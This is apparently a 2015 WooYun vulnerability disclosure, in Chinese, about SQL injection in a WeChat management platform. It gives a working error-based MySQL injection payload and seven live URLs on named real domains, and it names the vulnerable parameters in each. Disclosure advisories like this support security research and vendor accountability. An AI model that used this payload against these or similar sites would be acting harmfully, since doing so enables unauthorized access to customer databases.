当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145294

漏洞标题:某微信管理系统存在sql注入(13处打包)

相关厂商:微平台联盟

漏洞作者: 路人甲

提交时间:2015-10-08 12:41

修复时间:2015-11-22 12:42

公开时间:2015-11-22 12:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某微信管理系统存在sql注入(13处打包)

详细说明:

看到前人发的有感而发。
payload

or (SELECT 3442 FROM(SELECT COUNT(*)%2CCONCAT(md5(0x22)%2C(SELECT (ELT(3442%3D3442%2C1)))%2C0x7171717071%2CFLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)


相关案例:

1.
http://admin.wptlm.com/weixinpl/exp_assistant/assistantcreate-records.php?customer_id=5941&obj_id=-1&fromuser=null
2.
http://admin.wptlm.com/weixinpl/abeliangroups/apply.php?abeliangroup_id=25
3.
http://admin.wptlm.com/weixinpl/abeliangroups/cart_order.php?abeliangroup_id=25
4.
http://admin.wptlm.com/weixinpl/zhengwu/apply.php?zhengwu_id=67&customer_id=5941&user_id=744163
5.
http://admin.wptlm.com/weixinpl/abeliangroups/create_order.php?abeliangroup_id=25&member_id=288
6.
http://admin.aoyunzg.com/weixinpl/coupon2/coupon.php?customer_id=8225&obj_id=925&fromuser=null&wxref=mp.weixin.qq.com
7.
http://admin.wptlm.com/weixinpl/weixin_inter/create_sellqr.php?customer_id=5941&scene_id=40&user_id=777506&qr_info_id=1181&pid=-1


屏幕截图(1007).png


漏洞证明:

注入证明:
1.assistantcreate-records.php里的customer_id 和obj_id 两处
http://admin.wptlm.com/weixinpl/exp_assistant/assistantcreate-records.php?customer_id=5941&obj_id=-1&fromuser=null

屏幕截图(1008).png


屏幕截图(1009).png


2.
http://admin.wptlm.com/weixinpl/abeliangroups/apply.php?abeliangroup_id=25

屏幕截图(1010).png


屏幕截图(1011).png


3.
http://admin.wptlm.com/weixinpl/abeliangroups/cart_order.php?abeliangroup_id=25

屏幕截图(1012).png


屏幕截图(1013).png


4.apply.php里的zhengwu_id和customer_id 两处
http://admin.wptlm.com/weixinpl/zhengwu/apply.php?zhengwu_id=67&customer_id=5941&user_id=744163

屏幕截图(1014).png


屏幕截图(1015).png


5.
http://admin.wptlm.com/weixinpl/abeliangroups/create_order.php?abeliangroup_id=25&member_id=288

屏幕截图(1016).png


屏幕截图(1017).png


6.coupon.php里的customer_id 和obj_id还有fromuser
http://admin.aoyunzg.com/weixinpl/coupon2/coupon.php?customer_id=8225&obj_id=925&fromuser=null&wxref=mp.weixin.qq.com

屏幕截图(1018).png


屏幕截图(1019).png


7.create_sellqr.php里的customer_id和user_id还有qr_info_id
http://admin.wptlm.com/weixinpl/weixin_inter/create_sellqr.php?customer_id=5941&scene_id=40&user_id=777506&qr_info_id=1181&pid=-1

屏幕截图(1020).png


屏幕截图(1021).png


。。。。

修复方案:

。。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝